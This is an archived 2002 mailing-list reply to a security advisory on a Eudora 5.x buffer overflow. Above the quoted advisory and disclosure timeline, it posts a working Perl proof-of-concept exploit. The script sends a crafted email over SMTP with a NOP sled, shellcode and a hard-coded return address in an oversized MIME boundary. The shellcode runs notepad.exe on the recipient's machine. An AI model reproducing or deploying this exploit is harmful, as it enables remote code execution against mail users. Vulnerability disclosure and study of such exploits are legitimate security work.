Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability

From: Kanatoko (anvilat_private)
Date: Mon Aug 05 2002 - 23:49:24 PDT

  • Next message: securityat_private: "Security Update: [CSSA-2002-034.0] Linux: buffer overflow in multiple DNS resolver libraries" 

    This is a proof of concept exploit for Eudora 5.x buffer overflow.

Tested on:
  Japanese Windows 2000 Professional SP2
  Eudora Version 5.0.2-Jr2


#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvilat_private>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = 'anvilat_private';
$env_to         = 'targetat_private';
$from           = 'anvilat_private';
$to             = 'targetat_private';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;


-- 
Kanatoko  <anvilat_private>
JUMPER : http://www.jumperz.net/(Japanese)


On Mon, 05 Aug 2002 15:24:25 +0900
snsadvat_private wrote:

> ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
> 
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
> 
> Overview:
> ---------
>   Eudora 5.x for Windows contains a buffer overflow vulnerability, 
>   which could allow a remote attacker to execute arbitrary code.
> 
> Problem Description:
> --------------------
>   Eudora developed and distributed by QUALCOMM Inc. 
>   (http://www.qualcomm.com/), is a Mail User Agent running on Windows 
>   95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
> 
>   The buffer overflow occurs when Eudora receives a message using a long
>   string as a boundary, which is used to divide a multi-part message into
>   separate parts.  In our verification environment, we have found that 
>   this could allow arbitrary commands to be executed. 
> 
> Tested Version:
> ---------------
>   Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
>   Eudora 5.1.1 for Windows (Sponsored Mode) [English]
> 
> Tested OS:
> ----------
>   Microsoft Windows 2000 Professional SP2 [Japanese]
>   Microsoft Windows 98 SE [Japanese]
> 
> Solution:
> ---------
>   The problem will be fixed in the next release of Eudora.
>   The vendor has not reported when the next release will be available.
> 
> Communication background:
> -------------------------
>  6 Jun 2002  : We discovered the vulnerability.
>  6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd. 
>                (user support of Japanese version) .
>  14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
>                Ltd. .
>  17 Jun 2002 : We contacted QUALCOMM Inc. .
>  18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
>                investigation of the problem.
>  3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
>                investigation
>  19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
>                investigation
>  24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
>                of this advisory
>  25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
>                the next release
>  5 Aug 2002  : We decided to disclose this vulnerability due to concern
>                over the potential consequences this issue may cause.
>                Livin' on the EDGE Co., Ltd. has not provided any comments
>                on this issue as of August 5, 2002.
> 
> Discovered by:
> --------------
>   Nobuo Miwa (LAC / n-miwaat_private)
> 
> Disclaimer:
> -----------
>   All information in these advisories are subject to change without any 
>   advanced notices neither mutual consensus, and each of them is released 
>   as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences 
>   caused by applying those information.
> 
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadvat_private>
> Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
> 
>

    This archive was generated by hypermail 2b30 : Tue Aug 06 2002 - 12:20:31 PDT